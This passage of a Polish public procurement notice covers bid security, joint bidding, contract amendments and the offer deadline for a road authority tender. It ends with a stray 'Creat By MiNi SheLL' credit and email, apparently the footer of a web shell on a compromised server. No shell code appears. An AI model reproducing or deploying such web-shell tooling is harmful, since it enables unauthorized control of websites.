środków na rachunek bankowy Zamawiającego nastąpi przed upływem terminu<br/>składania ofert (decyduje data i godzina wpływu środków).<br/>13.6. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>13.7. Jeżeli wadium wnoszone jest w gwarancjach lub poręczeniach Wykonawca przekazuje<br/>Zamawiającemu oryginał takiego dokumentu w postaci dokumentu elektronicznego<br/>opatrzonego kwalifikowanym podpisem elektronicznym, bądź podpisem zaufanym lub<br/>podpisem osobistym przez osoby upoważnione do jego wystawienia (wystawcę<br/>dokumentu). Zamawiający nie dopuszcza możliwości złożenia skanu dokumentu wadialnego<br/>opatrzonego kwalifikowanym podpisem elektronicznym, bądź podpisem zaufanym lub<br/>podpisem osobistym. Wykonawca składa wadium za pomocą jednego ze środków komunikacji<br/>elektronicznej określonego w pkt 3.4. SWZ przed upływem terminu składania ofert lub załącza<br/>do oferty.<br/>13.8. Dokument wadium wniesiony w formie gwarancji lub poręczeń, musi zawierać w szczególności:<br/> określenie postępowania (jego nazwę, nr postępowania i nr zadania, na które składane jest<br/>wadium),<br/> nazwę Wykonawcy,<br/> określenie Zamawiającego jako beneficjenta,<br/> wysokość gwarantowanej kwoty wadium,<br/> termin ważności gwarancji lub poręczenia, który nie może być krótszy niż termin związania<br/>ofertą,<br/> dokument wadium musi być podpisany przez upoważnionego przedstawiciela gwaranta. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 6.3.1. O udzielenie zamówienia mogą ubiegać się Wykonawcy występujący wspólnie. Wykonawcy<br/>ubiegający się wspólnie o udzielenie zamówienia ustanawiają pełnomocnika (lidera)<br/>do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania<br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wykonawcy, którzy<br/>ubiegają się wspólnie o udzielenie zamówienia, ponoszą solidarną odpowiedzialność<br/>za wykonanie umowy. Do oferty należy wówczas dołączyć pełnomocnictwo z którego treści<br/>musi wynikać do której czynności powołano pełnomocnika - lidera (np. reprezentowanie<br/>w postępowaniu, zawarcia umowy) i jakiego postępowania dotyczy.<br/>6.3.2. W odniesieniu do warunków, o których mowa w pkt 6.1.3 - 6.1.4. SWZ Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców,<br/>którzy wykonają roboty budowlane do realizacji których te zdolności są wymagane. W takim<br/>przypadku Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni<br/>Wykonawcy.<br/>8.3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców:<br/>1) Formularz oferty stanowiący Załącznik nr 1 do SWZ musi być podpisany przez osobę/osoby<br/>reprezentującą/reprezentujące wszystkich Wykonawców na podstawie stosownego<br/>pełnomocnictwa lub podpisane przez wszystkich Wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia,<br/>2) Załącznik nr 2 i 3 do SWZ składa oddzielnie każdy z Wykonawców wspólnie ubiegających<br/>się o zamówienie.<br/>8.4. Wszystkie dokumenty określone w pkt 8.1. SWZ, pod rygorem nieważności, należy złożyć<br/>w postaci dokumentu elektronicznego – musi być opatrzony kwalifikowanym podpisem<br/>elektronicznym, bądź podpisem zaufanym lub podpisem osobistym. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza zmiany w treści umowy zgodnie z Kodeksem cywilnym, art. 436, art.<br/>439 i art. 455 ustawy Pzp. Zakres dopuszczalnych zmian określa §12 projektu umowy (Załącznik<br/>nr 10 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-14 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku na ePUAP: PZD-Przeworsk i udostępnionego również na miniPortalu.Funkcjonalność do zaszyfrowania oferty przez Wykonawcę jest dostępna dla Wykonawców na miniPortalu,w szczegółach danego postępowania miniPortalu: https://miniportal.uzp.gov.pl/Postepowania/32951c16-8d7a-4c82-97c3-cd4a6946bdde</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-14 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com